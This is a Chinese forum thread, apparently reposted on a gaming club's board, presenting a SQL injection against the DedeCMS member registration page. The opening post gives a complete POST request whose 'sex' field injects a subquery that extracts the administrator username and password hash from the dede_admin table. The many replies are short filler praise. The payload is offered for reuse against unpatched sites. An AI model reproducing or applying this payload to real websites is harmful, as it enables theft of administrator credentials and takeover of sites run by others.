天泽在线_深圳CS俱乐部_CS对战平台_Cs1.6_amxx_sma插件_CS论坛

标题: 织梦SQL注入漏洞再利用 [打印本页]

作者: admin 时间: 2013-1-19 10:06
标题: 织梦SQL注入漏洞再利用
漏洞类型： SQL注射漏洞
简要描述：

需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
详细说明：跟这个漏洞

WooYun: Dedecms SQL注射导致审核机制绕过漏洞
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
POST提交以下数据,其实不用POST提交的,这样隐蔽点.

http://www.iswin.org/member/reg_new.php

POST

dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
userid=c4rp3nt3r&uname=c4rp3nt3r
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
&safequestion=0&safeanswer=&sex=boy',100,100,'[email protected]',1000,0,'www' and @`'`,
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
%00&vdcode=glos&agree=

作者: 海叔叔 时间: 2013-2-3 01:43
就为赚分嘛

作者: 一条第一天 时间: 2014-10-13 19:32
回个帖子支持一下！

作者: 枭阳 时间: 2014-10-26 16:58
不错不错比我强多了

作者: 昨天今天打飞机 时间: 2014-11-6 01:15
任何的限制，都是从自己的内心开始的。

作者: 昌奥妙财 时间: 2014-11-18 15:52
厉害！强~~~~没的说了！

作者: 呜呜呜呜哈哈哈 时间: 2014-12-6 10:23
不错，支持下

作者: 額、記得 时间: 2014-12-29 16:15
彪悍的人生不需要解释。

作者: 何盛安 时间: 2015-1-29 11:50
这贴？不回都不行啊

作者: 只为红颜一笑 时间: 2015-3-3 15:49
顶一个先

作者: 小到消息 时间: 2015-3-31 09:14
慢慢来，呵呵

作者: 安凯尔 时间: 2015-5-4 01:02
琴棋书画不会，洗衣做饭嫌累。

作者: 试试是 时间: 2015-6-10 04:40
你加油吧

作者: 斥候 时间: 2015-7-16 15:47
小生对楼主之仰慕如滔滔江水连绵不绝,海枯石烂,天崩地裂,永不变心.

作者: 阿四 时间: 2015-8-20 13:06
支持你就顶你

作者: 她如命 时间: 2015-9-21 15:28
我有家的感觉~~你知道吗

作者: 金影雨芬飞 时间: 2015-10-24 21:16
努力,努力,再努力!!!!!!!!!!!

作者: 爱上自习 时间: 2015-12-1 06:22
不错，看看。

作者: 小米科技 时间: 2016-1-16 03:40
哈哈，看的人少，回一下

作者: 吴先生 时间: 2016-2-26 05:38
顶你一下，好贴要顶！

作者: 稚名丶夜猫 时间: 2016-4-16 18:55
人生感悟：牵手时，即使你的手有多汗，也别放开。

作者: 阿剑同名 时间: 2016-6-19 11:00
不错!

作者: 女同性恋 时间: 2016-7-31 00:38
既然来了，就留个脚印

作者: 呵呵邻居妹妹 时间: 2016-10-1 09:30
希望可以用些时间了~````

作者: ☆【锋哥】☆ 时间: 2016-11-23 21:23
呵呵,支持一下哈

作者: -=-=-= 时间: 2017-1-23 07:47
哈哈我支持你

欢迎光临天泽在线_深圳CS俱乐部_CS对战平台_Cs1.6_amxx_sma插件_CS论坛 (https://bbs.tianzept.com/)